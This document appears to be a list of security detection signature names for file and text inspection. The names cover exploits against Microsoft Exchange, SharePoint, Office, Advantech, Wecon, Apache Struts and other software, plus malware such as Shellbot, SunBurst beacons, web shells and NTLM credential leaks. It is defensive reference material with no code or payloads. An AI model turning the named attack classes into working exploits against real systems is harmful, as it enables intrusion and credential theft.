File-TextId_Microsoft-Excel-Security-Feature-Bypass
File-TextId_Microsoft-Exchange-Approvedapplication-Insecure-Deserialization
File-TextId_Microsoft-Exchange-Calendar-Code-Execution
File-TextId_Microsoft-Exchange-Deserialization-Remote-Code-Execution
File-TextId_Microsoft-Exchange-PowerShell-Mobilemailboxpolicy-Insecure-Deserialization
File-TextId_Microsoft-Exchange-PowerShell-Remoting-Dumpdatareader-Insecure-Deserialization
File-TextId_Microsoft-Exchange-PowerShell-Remoting-Federationtrust-Insecure-Deserialization
File-TextId_Microsoft-Exchange-PowerShell-Remoting-Xamlimageinfo-Insecure-Deserialization
File-TextId_Microsoft-Exchange-RCE-Multiple-Vulnerabilities
File-TextId_Microsoft-Exchange-Server-CVE-2022-23277-Insecure-Deserialization
File-TextId_Microsoft-Exchange-Server-CVE-2022-24463-External-Entity-Injection
File-TextId_Microsoft-Exchange-Server-Ews-Userconfiguration-Insecure-Deserialization
File-TextId_Microsoft-Exchange-Server-ExportExhangeCertificate-Arbitrary-File-Write
File-TextId_Microsoft-Exchange-Server-NewExchangeCertificate-Arbitrary-File-Write
File-TextId_Microsoft-Exchange-Transportconfigcontainer-Insecure-Deserialization
File-TextId_Microsoft-Exchange-Unsafe-Deserialization
File-TextId_Microsoft-FrontPage-Information-Disclosure-Vulnerability
File-TextId_Microsoft-Help-Workshop-CNT-Help-Contents-Buffer-Overflow
File-TextId_Microsoft-Help-Workshop-Hpj-Options-Section-Buffer-Overflow
File-TextId_Microsoft-Internet-Explorer-CDF-Cross-Domain-Scripting
File-TextId_Microsoft-Internet-Explorer-Content-Advisor-Memory-Corruption
File-TextId_Microsoft-Internet-Explorer-CVE-2014-0283-Use-After-Free
File-TextId_Microsoft-Internet-Explorer-CVE-2015-1665-Use-After-Free
File-TextId_Microsoft-Internet-Explorer-Initfromstring-Function-Out-Of-Bounds-Memory-Access
File-TextId_Microsoft-Internet-Explorer-Propertydesc-Double-Free
File-TextId_Microsoft-Internet-Explorer-SVG-Marker-Object-Use-After-Free
File-TextId_Microsoft-Internet-Explorer-SVG-Memory-Corruption-CVE-2015-6134
File-TextId_Microsoft-MSHTML-CVE-2021-40444-Remote-Code-Execution
File-TextId_Microsoft-Office-ASLR-Bypass-CVE-2015-2375
File-TextId_Microsoft-Office-Ctasksymbol-Use-After-Free
File-TextId_Microsoft-Office-CVE-2015-1649
File-TextId_Microsoft-Office-CVE-2015-1650
File-TextId_Microsoft-Office-CVE-2015-1682-Remote-Code-Execution
File-TextId_Microsoft-Office-CVE-2016-3284-Memory-Corruption
File-TextId_Microsoft-Office-CVE-2019-0560-Information-Disclosure
File-TextId_Microsoft-Office-Eps-CVE-2017-0262-Type-Confusion
File-TextId_Microsoft-Office-Excel-Freephisxdb-Arbitrary-Free-CVE-2023-32029
File-TextId_Microsoft-Office-Excel-Webcharts-Out-Of-Bounds-Write
File-TextId_Microsoft-Office-Memory-Corruption-Vulnerability-CVE-2015-2558
File-TextId_Microsoft-Office-Oleobject-Type-Confusion
File-TextId_Microsoft-Office-RCE-CVE-2017-0199
File-TextId_Microsoft-Office-Uninitialized-Memory-Use-Vulnerability-CVE-2015-1770
File-TextId_Microsoft-Office-Word-And-Web-Apps-Memory-Corruption
File-TextId_Microsoft-Outlook-iCal-Meeting-Request-Vevent-Memory-Corruption
File-TextId_Microsoft-PowerShell-Remoting-Tabexpansion-Sandbox-Bypass
File-TextId_Microsoft-SharePoint-Remote-Code-Execution-CVE-2020-17061
File-TextId_Microsoft-Sharepoint-Remote-Code-Execution-Vulnerability-CVE-2023-33157
File-TextId_Microsoft-SharePoint-Server-RCE-CVE-2021-1707
File-TextId_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2021-26420
File-TextId_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-21400
File-TextId_Microsoft-Sharepoint-Server-Remote-Code-Execution-CVE-2025-29794
File-TextId_Microsoft-SharePoint-XML-External-Entity-CVE-2021-24072
File-TextId_Microsoft-Sharepoint-Xml-Handling-Remote-File-Disclosure
File-TextId_Microsoft-Step-By-Step-Interactive-Training-Bookmark-Link
File-TextId_Microsoft-Visio-DXF-File-Handling-Code-Execution
File-TextId_Microsoft-Visio-DXF-File-Inserting-Buffer-Overflow
File-TextId_Microsoft-Visio-External-Entities-Resolution-Vulnerability
File-TextId_Microsoft-Visio-External-Entities-Resolution-Vulnerability-2
File-TextId_Microsoft-Visual-Basic-6.0-Vbp-Project-File-Handling-BOF
File-TextId_Microsoft-Visual-Basic-Vb6stkiy.dll-ActiveX-Control-BOF
File-TextId_Microsoft-Visual-Studio-Project-Name-BOF
File-TextId_Microsoft-Windows-Address-Book-Contact-File-Parsing-CVE-2020-1410
File-TextId_Microsoft-Windows-Adobe-Font-Driver-CVE-2015-0092-Memory-Corruption
File-TextId_Microsoft-Windows-Common-Control-Library-Heap-Buffer-Overflow
File-TextId_Microsoft-Windows-Comsvcs.dll-Insecure-Library-Loading
File-TextId_Microsoft-Windows-Contacts-Fnsummaryproc-Remote-Code-Execution
File-TextId_Microsoft-Windows-Els.dll-Insecure-Library-Loading
File-TextId_Microsoft-Windows-Event-Viewer-Information-Disclosure
File-TextId_Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow
File-TextId_Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2023-36025
File-TextId_Microsoft-Windows-Internet-Shortcut-File-Security-Feature-Bypass-CVE-2024-21412
File-TextId_Microsoft-Windows-Media-Player-ASX-Playlist-Parsing-Buffer-Overflow
File-TextId_Microsoft-Windows-Message-Queuing-Service-SRMP-DoS-CVE-2023-36606
File-TextId_Microsoft-Windows-MSHTML-Platform-Remote-Code-Execution-CVE-2023-35628
File-TextId_Microsoft-Windows-Msvcrt.dll-Buffer-Overflow-CVE-2012-0150
File-TextId_Microsoft-Windows-NTLM-Relay-CVE-2025-24054
File-TextId_Microsoft-Windows-Object-Packager-Remote-Code-Execution
File-TextId_Microsoft-Windows-OLE-CVE-2016-0153-Code-Execution
File-TextId_Microsoft-Windows-Remote-Assistance-Xxe-Injection-Information-Disclosure
File-TextId_Microsoft-Windows-Remote-Code-Execution-CVE-2016-0018
File-TextId_Microsoft-Windows-Shell-File-Name-Code-Execution
File-TextId_Microsoft-Windows-Support-Diagnostic-Tool-Path-Traversal-CVE-2022-34713
File-TextId_Microsoft-Windows-Type1-Font-Parsing-Remote-Code-Execution-1
File-TextId_Microsoft-Windows-Type1-Font-Parsing-Remote-Code-Execution-2
File-TextId_Microsoft-Windows-Vista-Contacts-Gadget-Code-Execution
File-TextId_Microsoft-Windows-Vista-Feed-Headlines-Gadget-Code-Execution
File-TextId_Microsoft-Windows-WebDAV-Mini-Redirector-Buffer-Overflow
File-TextId_Microsoft-Windows-WebDav-Mini-Redirector-Heap-Buffer-Overflow
File-TextId_Microsoft-Word-2003-XML-Document
File-TextId_Microsoft-Word-2010-Document
File-TextId_Microsoft-Word-2013-Document
File-TextId_Microsoft-Word-Use-After-Free-CVE-2011-1983
File-TextId_Microsoft-XML-Core-Services-Content-Parsing-Memory-Corruption
File-TextId_Microsoft-XML-Editor-External-Entities-Resolution-CVE-2011-1280
File-TextId_Microsoft_Exchange_Server-Remote_Code_Execution_CVE-2021-28482
File-TextId_Microsoft_Exchange_Suspicious-Request_CVE-2021-28482
File-TextId_Microsoft_Sharepoint_Deserialization_Vulnerability_CVE-2022-38053
File-TextId_Mirth-Connect-Remote-Code-Execution-CVE-2023-43208
File-TextId_MONSOON-CnC-Traffic
File-TextId_Mozilla-Firefox-Domsvglength-Reflected-Attribute-Use-After-Free
File-TextId_Mozilla-Firefox-Layout-Frame-Constructor-Memory-Corruption
File-TextId_Mozilla-Firefox-Multiple-URI-Handlers-Command-Execution
File-TextId_Mozilla-Firefox-nsTreeRange-Use-After-Free
File-TextId_Mozilla-Firefox-XBL-Event-Handler-Tags-Removal-Memory-Corruption
File-TextId_Mozilla-Firefox-XUL-menupopup.menu-Null-Pointer-Dereference-DoS
File-TextId_Mozilla-Products-SVG-Layout-Engine-Index-Parameter-Memory-Corruption
File-TextId_Mozilla-Products-SVG-Rendering-Engine-Integer-Overflow
File-TextId_Mozilla-SVG-Data-Processing-Memory-Corruption
File-TextId_MPlayer-Sami-Subtitle-Buffer-Overflow
File-TextId_MS-Active-Directory-Federation-Services-Information-Disclosure
File-TextId_MS-Visio-DXF-File-Buffer-Overflow-CVE-2012-1888
File-TextId_MS-Windows-Msxml-Information-Disclosure-Vulnerability
File-TextId_Netgate-Pfsense-Restore_rrddata-Command-Injection
File-TextId_NewsGator-FeedDemon-OPML-Outline-Buffer-Overflow
File-TextId_NI-Flexlogger-Flxproj-File-Parsedatavalueasxmlhierarchy-Insecure-Deserialization
File-TextId_Novell-eDirectory-eMBox-Unauthenticated-File-Access
File-TextId_Novell-Groupwise-Addressbook-Heap-Buffer-Overflow
File-TextId_Novell-Groupwise-iCal-RRULE-Time-Conversion-Invalid-Array-Indexing
File-TextId_Novell-Groupwise-Internet-Agent-ICalendar-Parsing-Denial-Of-Service
File-TextId_Novell-Groupwise-Internet-Agent-RRULE-Weekday-Parsing
File-TextId_Novell-Groupwise-Messenger-Client-Buffer-Overflow
File-TextId_NTLM-Credential-Leak-Via-Internet-Shortcut-CVE-2023-32046
File-TextId_NTLM-Hash-Disclosure-CVE-2024-43451
File-TextId_Office-Open-XML-Document
File-TextId_Office-Open-XML-Workbook
File-TextId_Office-XML-Macro-Document
File-TextId_Office-XML-Object-Shared-Variables
File-TextId_OPC-UA-HTTP/XML-ActivateSession-Request
File-TextId_OPC-UA-HTTP/XML-ActivateSession-Response
File-TextId_OPC-UA-HTTP/XML-AddNodes-Request
File-TextId_OPC-UA-HTTP/XML-AddNodes-Response
File-TextId_OPC-UA-HTTP/XML-AddReferences-Request
File-TextId_OPC-UA-HTTP/XML-AddReferences-Response
File-TextId_OPC-UA-HTTP/XML-Browse-Request
File-TextId_OPC-UA-HTTP/XML-Browse-Response
File-TextId_OPC-UA-HTTP/XML-BrowseNext-Request
File-TextId_OPC-UA-HTTP/XML-BrowseNext-Response
File-TextId_OPC-UA-HTTP/XML-Call-Request
File-TextId_OPC-UA-HTTP/XML-Call-Response
File-TextId_OPC-UA-HTTP/XML-Cancel-Request
File-TextId_OPC-UA-HTTP/XML-Cancel-Response
File-TextId_OPC-UA-HTTP/XML-CloseSecureChannel-Request
File-TextId_OPC-UA-HTTP/XML-CloseSecureChannel-Response
File-TextId_OPC-UA-HTTP/XML-CloseSession-Request
File-TextId_OPC-UA-HTTP/XML-CloseSession-Response
File-TextId_OPC-UA-HTTP/XML-CreateMonitoredItems-Request
File-TextId_OPC-UA-HTTP/XML-CreateMonitoredItems-Response
File-TextId_OPC-UA-HTTP/XML-CreateSession-Request
File-TextId_OPC-UA-HTTP/XML-CreateSession-Response
File-TextId_OPC-UA-HTTP/XML-CreateSubscription-Request
File-TextId_OPC-UA-HTTP/XML-CreateSubscription-Response
File-TextId_OPC-UA-HTTP/XML-DeleteMonitoredItems-Request
File-TextId_OPC-UA-HTTP/XML-DeleteMonitoredItems-Response
File-TextId_OPC-UA-HTTP/XML-DeleteNodes-Request
File-TextId_OPC-UA-HTTP/XML-DeleteNodes-Response
File-TextId_OPC-UA-HTTP/XML-DeleteReferences-Request
File-TextId_OPC-UA-HTTP/XML-DeleteReferences-Response
File-TextId_OPC-UA-HTTP/XML-DeleteSubscriptions-Request
File-TextId_OPC-UA-HTTP/XML-DeleteSubscriptions-Response
File-TextId_OPC-UA-HTTP/XML-FindServers-Request
File-TextId_OPC-UA-HTTP/XML-FindServers-Response
File-TextId_OPC-UA-HTTP/XML-GetEndpoints-Request
File-TextId_OPC-UA-HTTP/XML-GetEndpoints-Response
File-TextId_OPC-UA-HTTP/XML-HistoryRead-Request
File-TextId_OPC-UA-HTTP/XML-HistoryRead-Response
File-TextId_OPC-UA-HTTP/XML-HistoryUpdate-Request
File-TextId_OPC-UA-HTTP/XML-HistoryUpdate-Response
File-TextId_OPC-UA-HTTP/XML-ModifyMonitoredItems-Request
File-TextId_OPC-UA-HTTP/XML-ModifyMonitoredItems-Response
File-TextId_OPC-UA-HTTP/XML-ModifySubscription-Request
File-TextId_OPC-UA-HTTP/XML-ModifySubscription-Response
File-TextId_OPC-UA-HTTP/XML-OpenSecureChannel-Request
File-TextId_OPC-UA-HTTP/XML-OpenSecureChannel-Response
File-TextId_OPC-UA-HTTP/XML-Publish-Request
File-TextId_OPC-UA-HTTP/XML-Publish-Response
File-TextId_OPC-UA-HTTP/XML-QueryFirst-Request
File-TextId_OPC-UA-HTTP/XML-QueryFirst-Response
File-TextId_OPC-UA-HTTP/XML-QueryNext-Request
File-TextId_OPC-UA-HTTP/XML-QueryNext-Response
File-TextId_OPC-UA-HTTP/XML-Read-Request
File-TextId_OPC-UA-HTTP/XML-Read-Response
File-TextId_OPC-UA-HTTP/XML-RegisterNodes-Request
File-TextId_OPC-UA-HTTP/XML-RegisterNodes-Response
File-TextId_OPC-UA-HTTP/XML-RegisterServer-Request
File-TextId_OPC-UA-HTTP/XML-RegisterServer-Response
File-TextId_OPC-UA-HTTP/XML-Republish-Request
File-TextId_OPC-UA-HTTP/XML-Republish-Response
File-TextId_OPC-UA-HTTP/XML-ServiceFault
File-TextId_OPC-UA-HTTP/XML-SetMonitoringMode-Request
File-TextId_OPC-UA-HTTP/XML-SetMonitoringMode-Response
File-TextId_OPC-UA-HTTP/XML-SetPublishingMode-Request
File-TextId_OPC-UA-HTTP/XML-SetPublishingMode-Response
File-TextId_OPC-UA-HTTP/XML-SetTriggering-Request
File-TextId_OPC-UA-HTTP/XML-SetTriggering-Response
File-TextId_OPC-UA-HTTP/XML-Shared-Variables
File-TextId_OPC-UA-HTTP/XML-TestStack-Request
File-TextId_OPC-UA-HTTP/XML-TestStack-Response
File-TextId_OPC-UA-HTTP/XML-TestStackEx-Request
File-TextId_OPC-UA-HTTP/XML-TestStackEx-Response
File-TextId_OPC-UA-HTTP/XML-TransferSubscriptions-Request
File-TextId_OPC-UA-HTTP/XML-TransferSubscriptions-Response
File-TextId_OPC-UA-HTTP/XML-TranslateBrowsePathsToNodeIds-Request
File-TextId_OPC-UA-HTTP/XML-TranslateBrowsePathsToNodeIds-Response
File-TextId_OPC-UA-HTTP/XML-UnregisterNodes-Request
File-TextId_OPC-UA-HTTP/XML-UnregisterNodes-Response
File-TextId_OPC-UA-HTTP/XML-Write-Request
File-TextId_OPC-UA-HTTP/XML-Write-Response
File-TextId_OpenNMS-Authenticated-Remote-Code-Execution
File-TextId_OpenOffice.org-XPM-File-Processing-Integer-Overflow
File-TextId_Opera-SVG-Animation-Element-DoS
File-TextId_Opera-SVG-clipPath-After-Memory-Corruption
File-TextId_Oracle-Business-Intelligence-CVE-2021-2401-Xdo-Xml-External-Entity-Injection
File-TextId_Oracle-Business-Intelligence-External-Entity-Injection-CVE-2019-2616
File-TextId_Oracle-Business-Intelligence-Publisher-Xdo-Xml-External-Entity-Injection
File-TextId_Oracle-E-Business-Suite-Arbitrary-File-Upload-CVE-2022-21587
File-TextId_Oracle-GoldenGate-Veridata-Server-XML-Soap-Request-Buffer-Overflow
File-TextId_Oracle-Java-Web-Start-Argument-Injection-Remote-Code-Execution
File-TextId_Oracle-Outside-In-XPM-Image-Processing-Stack-Buffer-Overflow
File-TextId_Oracle-WebLogic-CVE-2019-2725-Insecure-Deserialization
File-TextId_Perl-Spreadsheet-Parseexcel-Code-Injection-CVE-2023-7101
File-TextId_Perl-WebShell-Usage-Detected
File-TextId_PHP-Filter-In-SVG-HREF
File-TextId_Possible-Malicious-XML-Scriplet
File-TextId_Potential-Ghostscript-Format-String-Exploitation-CVE-2024-29510
File-TextId_PowerShell-In-Office-Document
File-TextId_Progress-WhatsUp-Gold-Getfilewithoutzip-Directory-Traversal
File-TextId_RealNetworks-RealPlayer-Rmp-File-Heap-Buffer-Overflow
File-TextId_RealNetworks-RealPlayer-Rmp-File-Stack-Buffer-Overflow
File-TextId_RealNetworks-RealPlayer-URL-Parsing-Stack-Buffer-Overflow
File-TextId_RealNetworks-SMIL-Wallclock-Stack-Overflow
File-TextId_RealPlayer-SMIL-Screen-Size-System-Compromise
File-TextId_Realtek-SDK-Miniigd-OS-Command-Injection
File-TextId_Rockwell-Automation-CCW-ccwsln-External-Entity-Injection
File-TextId_Roundcube-Webmail-CVE-2023-5631-Stored-Cross-Site-Scripting
File-TextId_Roundcube-Webmail-Inline-Attachment-View-Stored-XSS-CVE-2024-42008
File-TextId_Roundcube-Webmail-SVG-Animate-Stored-Cross-Site-Scripting
File-TextId_Safari-Stack-Based-Out-Of-Bounds
File-TextId_SAP-Netweaver-CVE-2020-6287
File-TextId_SAP-Netweaver-Directory-Traversal
File-TextId_SAP-Netweaver-Information-Disclosure
File-TextId_SAP-Netweaver-Soap-Interface-Arbitrary-Command-Execution
File-TextId_SAP-Netweaver-Soap-Request-Sxpg_Call_System-Command-Execution
File-TextId_SAP-Netweaver-SQL-Injection-CVE-2016-2386
File-TextId_SAP-Solution-Manager-Missing-Authentication-Check-EEM-Servlet-Access
File-TextId_Schneider-Electric-IGSS-Dashboard-CVE-2023-3001-Insecure-Deserialization
File-TextId_Schneider-Electric-IGSS-DashBoard.exe-Insecure-Deserialization
File-TextId_Schneider-Electric-Vampset-Comtrade-Records-Buffer-Overflow
File-TextId_Script-In-SVG
File-TextId_Sew-Eurodrive-Movitools-Motionstudio-Checkprojectbaseformat-XML-External-Entity-Injection
File-TextId_Shared-Variables
File-TextId_Sharepoint-NTLM-Relay-Improper-Input-Validation-CVE-2023-24950
File-TextId_Shellbot-Malware
File-TextId_Siemens-JT2Go-Plmxml-File-Parsing-External-Entity-Injection
File-TextId_Sierra-Wireless-ALEOS-Acemanager-File-Upload-CVE-2023-40460
File-TextId_SnakeYaml-Constructor-Insecure-Deserialization-CVE-2022-1471
File-TextId_SoapUI-WSDL-Remote-Code-Execution-CVE-2014-1202
File-TextId_Solarwinds-SunBurst-Beacon
File-TextId_SonicWall-Gms-Virtual-Appliance-Command-Injection
File-TextId_Splunk-Enterprise-Code-Execution-CVE-2023-46214
File-TextId_Sun-Java-Web-Start-Charset-Encoding-Stack-Buffer-Overflow
File-TextId_Sun-Java-Web-Start-Jnlp-Java-vm-args-Heap-Buffer-Overflow
File-TextId_Sun-Java-Web-Start-Jnlp-vm-args-Stack-Overflow
File-TextId_Sun-Java-WebStart-Jnlp-Buffer-Overflow
File-TextId_Suspicious-ASPX-File-Content-Upload
File-TextId_Suspicious-Internet-Shortcut-File
File-TextId_Suspicious-Java-Serialized-Object
File-TextId_Suspicious-Jsp-File-Upload
File-TextId_Suspicious-SettingContent-MS-File
File-TextId_Suspicious-Text-File
File-TextId_Suspicious_Character_Data_Usage
File-TextId_Un4seen-XMPlay-Stack-Based-Buffer-Overflow
File-TextId_Unicode-Encoded-Obfuscated-Script-File
File-TextId_Very-Large-XML-File
File-TextId_Viber-URI-Handler-Remote-Code-Execution
File-TextId_VideoLAN-Client-Media-Player-Crafted-M3u-Format-String-Buffer-Overflow
File-TextId_VideoLAN-VLC-Media-Player-Realtext-File-Buffer-Overflow
File-TextId_VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-BOF
File-TextId_VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free
File-TextId_VideoLAN-VLC-XSPF-Memory-Corruption
File-TextId_Visam-Vbase-Automation-Base-Gestureconfigurations-External-Entity-Injection
File-TextId_Visam-Vbase-Automation-Base-Layersettings-External-Entity-Injection
File-TextId_Visam-Vbase-Automation-Base-Projektinfo-File-Parsing-External-Entity-Injection
File-TextId_Visam-Vbase-Automation-Base-Webremote-File-Parsing-External-Entity-Injection
File-TextId_VLC-Media-Player-MMS-Plugin-Stack-Buffer-Overflow
File-TextId_VMware-OVF-Tool-Format-String-Vulnerability
File-TextId_Vtiger-CRM-PHP-Code-Injection
File-TextId_Wecon-Levistudio-Address-Name-Heap-Buffer-Overflow
File-TextId_Wecon-Levistudio-Baseset-Bgonoffbitaddr-Stack-Buffer-Overflow
File-TextId_Wecon-Levistudio-Comset-Netipaddr-Stack-Buffer-Overflow
File-TextId_Wecon-Levistudio-Curscridaddr-Stack-Buffer-Overflow
File-TextId_Wecon-Levistudio-G_BMP-Szfilename-Two-Stack-Buffer-Overflow
File-TextId_Wecon-Levistudio-Hmiset-Type-Stack-Buffer-Overflow
File-TextId_Wecon-Levistudio-Installmentset-Installmenttrigaddopen-Stack-Buffer-Overflow
File-TextId_Wecon-Levistudio-MulStatus-Szfilename-Stack-Buffer-Overflow
File-TextId_Wecon-Levistudio-PLC-Type-Heap-Buffer-Overflow
File-TextId_Wecon-Levistudio-Screeninfo-Scrnname-Heap-Buffer-Overflow
File-TextId_Wecon-Levistudio-Shortmessage-Module-Smtext-Stack-Buffer-Overflow
File-TextId_Wecon-Levistudio-String-Content-Heap-Buffer-Overflow
File-TextId_Wecon-LeviStudioU-Address-Mapping-Contraladdr-Stack-Buffer-Overflow
File-TextId_Wecon-LeviStudioU-Address-Mapping-Digitcount-Stack-Buffer-Overflow
File-TextId_Wecon-LeviStudioU-Address-Mapping-Plcaddr-And-Dstaddr-Stack-Buffer-Overflow
File-TextId_Wecon-LeviStudioU-Alarm-Bitaddr-Stack-Buffer-Overflow
File-TextId_Wecon-LeviStudioU-Alarm-Tag-WordAddr-Stack-Buffer-Overflow
File-TextId_Wecon-LeviStudioU-Baseset-Entertime-And-Powerentertime-Stack-Buffer-Overflow
File-TextId_Wecon-LeviStudioU-Baseset-Hminame-Stack-Buffer-Overflow
File-TextId_Wecon-LeviStudioU-Baseset-Scridwordaddr-Stack-Buffer-Overflow
File-TextId_Wecon-LeviStudioU-CharSize-Stack-Buffer-Overflow
File-TextId_Wecon-LeviStudioU-Disc-Tag-WordAddr-Stack-Buffer-Overflow
File-TextId_Wecon-LeviStudioU-MultiLink-Bitaddr-Stack-Buffer-Overflow
File-TextId_Wecon-LeviStudioU-MultiLink-WordAddr-Stack-Buffer-Overflow
File-TextId_Wecon-LeviStudioU-Screeninfo-Scrnfile-Heap-Buffer-Overflow
File-TextId_Wecon-LeviStudioU-Trend-WordAddr-Stack-Buffer-Overflow
File-TextId_Wecon-LeviStudioU-Xyset-WordAddr-Stack-Buffer-Overflow
File-TextId_Wecon-Pistudio-Basedll-Textcontent-Stack-Based-Buffer-Overflow
File-TextId_Winamp-In-CDDA.dll-Buffer-Overflow
File-TextId_Winamp-Playlist-Buffer-Overflow
File-TextId_Winamp-XM-File-Heap-Overflow
File-TextId_Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-38112
File-TextId_WScript.Shell-ActiveX-Object-Local-File-Execute
File-TextId_WSO2-SynapseArtifactUploaderAdmin-Directory-Traversal-CVE-2024-7074
File-TextId_x86-X41nop-Shellcode
File-TextId_Xml-Dtd-External-Entity-Multiple-Vulnerabilities
File-TextId_XML-File
File-TextId_XMLDsig-Hmac-Truncation-Authentication-Bypass
File-TextId_XPM-LibXpm-Xpmparsecolors-Parsepixels-BOF
File-TextId_Xstream-Unsafe-Deserialization
File-TextId_Ysoserial-Generated-DotNet-Serialized-Object
File-TextId_Zimbra-Collaboration-Autodiscover-Servlet-Xxe
File-TextId_Zoho-Manageengine-Remote-Code-Execution-CVE-2022-35405
File-TextId_Zoho-Manageengine-Servicedesk-Plus-Wsdiscoveryservlet-Stored-XSS
File-Text_Aaencode-Obfuscated-Script-Detected
File-Text_ABB-Panel-Builder-800-Comli-Commandlineoptions-Stack-Based-Buffer-Overflow
File-Text_ABB-Test-Signal-Viewer-Cwgraph3d-ActiveX-Arbitrary-File-Creation
File-Text_Actionscript-Security-Bypass-Vulnerability-CVE-2016-4139
File-Text_ActiveX-Object-Obfuscated-Content
File-Text_ActiveX-Shared-Variables
File-Text_ActiveX-WScript-Shell-Call
File-Text_Adobe-Acrobat-And-Reader-Plugin-Object-Reloading-Memory-Corruption
File-Text_Adobe-Acrobat-File-Information-Disclosure
File-Text_Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Read-CVE-2019-7109
File-Text_Adobe-Acrobat-Joboptions-File-Parsing-Out-Of-Bounds-Write
File-Text_Adobe-Acrobat-Reader-Adobepdf-ActiveX-Use-After-Free
File-Text_Adobe-Acrobat-Reader-Plugin-Cross-Site-Scripting
File-Text_Adobe-Acrobat-XPS-Initial-Page-Processing-Format-String-Vulnerability
File-Text_Adobe-Acrobat-XPS-Processing-Format-String
File-Text_Adobe-Acropdf-ActiveX-Control-Memory-Corruption
File-Text_Adobe-Digital-Editions-Epub-Xxe-Information-Disclosure
File-Text_Adobe-Download-Manager-Getplus-ActiveX-Control-Buffer-Overflow
File-Text_Adobe-Flash-ActiveX-Buffer-Overflow
File-Text_Adobe-Flash-Player-Information-Disclosure
File-Text_Adobe-Flash-Player-Invalid-Object-Reference-Code-Execution
File-Text_Adobe-Flash-Player-Security-Bypass-CVE-2015-3099
File-Text_Adobe-Flash-Player-Security-Context-Bypass-CVE-2015-3044
File-Text_Adobe-Flash-Player-Stack-Overflow-CVE-2012-2035
File-Text_Adobe-Reader-Security-Bypass-CVE-2013-0624
File-Text_ADODB.Stream-ActiveX-Object-Local-Disk-Write
File-Text_Advantech-Studio-ISSymbol-ActiveX-Control-Buffer-Overflow
File-Text_Advantech-WebAccess-ActiveX-Convtosafearray-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Aspvcobj-ActiveX-Fileprocess-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Aspvcobj-ActiveX-Getlasttagnbr-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Aspvcobj-ActiveX-Getwidestrcpy-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Aspvcobj-ActiveX-Interfacefilter-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Aspvcobj.aspdatadriven-ActiveX-Getrecipeinfo-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-CellVision.ocx-ActiveX-Buffer-Overflow
File-Text_Advantech-WebAccess-Dvs.ocx-ActiveX-Buffer-Overflow
File-Text_Advantech-WebAccess-Epoch-Making.dll-ActiveX-Buffer-Overflow
File-Text_Advantech-WebAccess-NVLive.ocx-ActiveX-Buffer-Overflow
File-Text_Advantech-WebAccess-SCADA-Bwocxrun.ocx-Command-Execution
File-Text_Advantech-WebAccess-SCADA-Password-Parameter-Buffer-Overflow
File-Text_Advantech-WebAccess-SCADA-Projectname-Parameter-Buffer-Overflow
File-Text_Advantech-WebAccess-SCADA-Webeye.ocx-Obsolete-ActiveX-Control-Usage
File-Text_Advantech-WebAccess-SCADA-Webvact.ocx-Accesscode-Buffer-Overflow
File-Text_Advantech-WebAccess-SCADA-Webvact.ocx-GotoCmd-Buffer-Overflow
File-Text_Advantech-WebAccess-SCADA-Webvact.ocx-NodeName-Buffer-Overflow
File-Text_Advantech-WebAccess-SCADA-Webvact.ocx-Username-Buffer-Overflow
File-Text_Advantech-WebAccess-Stack-Based-Buffer-Overflow
File-Text_Advantech-WebAccess-Webdobj-ActiveX-Updateproject-Stack-Buffer-Overflow
File-Text_Advantech-WebAccess-Webeyeaudio.ocx-ActiveX-Buffer-Overflow
File-Text_Advantech-WISE-PaaS-RMM-SQLMgmt-Qrydata-SQL-Injection
File-Text_Agilent-Technologies-Feature-Extraction-ActiveX-Index-Boundary-Error
File-Text_Agobot-Traffic
File-Text_Akamai-Download-Manager-BOF
File-Text_Altnet-Download-Manager-ADM4-ActiveX-Control-Buffer-Overflow
File-Text_America-Online-ICQ-ActiveX-Control-DownloadAgent-Function-Called
File-Text_AMX-NetLinx-VNC-ActiveX-Control-Buffer-Overflow
File-Text_Android-Content-Provider-File-Disclosure
File-Text_AOL-Explorer-ActiveX-Vulnerable-Function-Call
File-Text_AOL-Phobox-Playlist-ActiveX-Component-Buffer-Overflow
File-Text_AOL-SuperBuddy-ActiveX-Control-Function-Deference
File-Text_Apache-Jspwiki-Userpreferences-Cross-Site-Request-Forgery
File-Text_Apache-Kylin-Getsparksubmitcmd-Command-Injection
File-Text_Apache-Kylin-Rest-API-Migratecube-Command-Injection
File-Text_Apache-Log4j-JDBC-Appender-JNDI-Injection
File-Text_Apache-Mod-Include-Buffer-Overflow
File-Text_Apache-Ofbiz-XmlRpc-Insecure-Deserialization
File-Text_Apache-OpenOffice-Text-Document-Malicious-Macro-Execution
File-Text_Apache-Root-Privilege-Escalation
File-Text_Apache-ShenYu-Admin-JWT-Authentication-Bypass-Vulnerability
File-Text_Apache-SkyWalking-Alarm-Wildcard-Search-Graphql-SQL-Injection
File-Text_Apache-Solr-Config-API-Insecure-Deserialization
File-Text_Apache-Struts-2-CVE-2017-9805-Exploit-Attempt
File-Text_Apache-Struts-2-Rest-Plugin-Xstream-Denial-Of-Service
File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-1
File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-2
File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-3
File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-4
File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-5
File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-6
File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-7
File-Text_Apache-Struts-2-Rest-Plugin-Xstreamhandler-Insecure-Deserialization-8
File-Text_Apache-Superset-Insecure-Deserialization-CVE-2023-37941
File-Text_Apache-Superset-Sqlite-URI-Bypass-CVE-2023-39265
